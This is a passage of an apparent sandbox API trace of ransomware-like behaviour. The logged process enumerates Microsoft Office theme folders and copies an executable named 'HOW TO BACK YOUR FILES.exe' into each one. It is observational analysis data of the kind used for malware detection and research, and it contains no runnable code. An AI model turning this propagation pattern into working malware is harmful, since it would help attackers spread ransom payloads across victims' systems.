lpString1="\\*") returned="\\*" [0075.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e4bf2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e4bf2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.154] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.154] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.154] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING" [0075.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1040 | out: hHeap=0x2b0000) returned 1 [0075.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2980 | out: hHeap=0x2b0000) returned 1 [0075.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned 62 [0075.154] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING" [0075.154] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.154] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.159] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.159] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e4e5400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e4e5400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.159] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.159] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.160] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA" [0075.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0fb8 | out: hHeap=0x2b0000) returned 1 [0075.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2960 | out: hHeap=0x2b0000) returned 1 [0075.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned 62 [0075.160] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA" [0075.160] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.160] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.164] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.164] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e4e5400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e4e5400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.164] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.164] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.164] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE" [0075.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0f30 | out: hHeap=0x2b0000) returned 1 [0075.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2940 | out: hHeap=0x2b0000) returned 1 [0075.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned 61 [0075.164] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE" [0075.164] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.164] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.170] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e4e5400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e4e5400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.171] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY" [0075.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0075.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2920 | out: hHeap=0x2b0000) returned 1 [0075.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned 59 [0075.171] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY" [0075.171] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.171] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.175] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.175] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e50b560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e50b560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.175] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.175] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.175] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN" [0075.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0ea8 | out: hHeap=0x2b0000) returned 1 [0075.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2900 | out: hHeap=0x2b0000) returned 1 [0075.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned 61 [0075.175] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN" [0075.175] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.175] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.181] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.181] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e50b560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e50b560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.181] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.181] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.181] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE" [0075.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0e20 | out: hHeap=0x2b0000) returned 1 [0075.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28e0 | out: hHeap=0x2b0000) returned 1 [0075.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned 63 [0075.181] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE" [0075.181] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.181] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.195] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e50b560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e50b560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.195] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.195] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.196] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE" [0075.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0d98 | out: hHeap=0x2b0000) returned 1 [0075.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28c0 | out: hHeap=0x2b0000) returned 1 [0075.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned 62 [0075.196] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE" [0075.196] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e5316c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e5316c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.203] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.203] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.204] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR" [0075.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0075.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28a0 | out: hHeap=0x2b0000) returned 1 [0075.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned 64 [0075.205] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR" [0075.205] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.205] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.212] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.213] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e557820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e557820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.213] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.213] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.213] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED" [0075.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0d10 | out: hHeap=0x2b0000) returned 1 [0075.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2880 | out: hHeap=0x2b0000) returned 1 [0075.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned 63 [0075.213] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED" [0075.213] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.213] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.218] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e557820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e557820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.218] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.218] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.219] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL" [0075.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0c88 | out: hHeap=0x2b0000) returned 1 [0075.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2860 | out: hHeap=0x2b0000) returned 1 [0075.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned 62 [0075.219] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL" [0075.219] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.219] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.224] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.224] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e57d980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e57d980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.224] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.224] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.224] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD" [0075.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0c00 | out: hHeap=0x2b0000) returned 1 [0075.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2840 | out: hHeap=0x2b0000) returned 1 [0075.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned 60 [0075.224] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD" [0075.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.228] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e57d980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e57d980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.229] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.229] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common 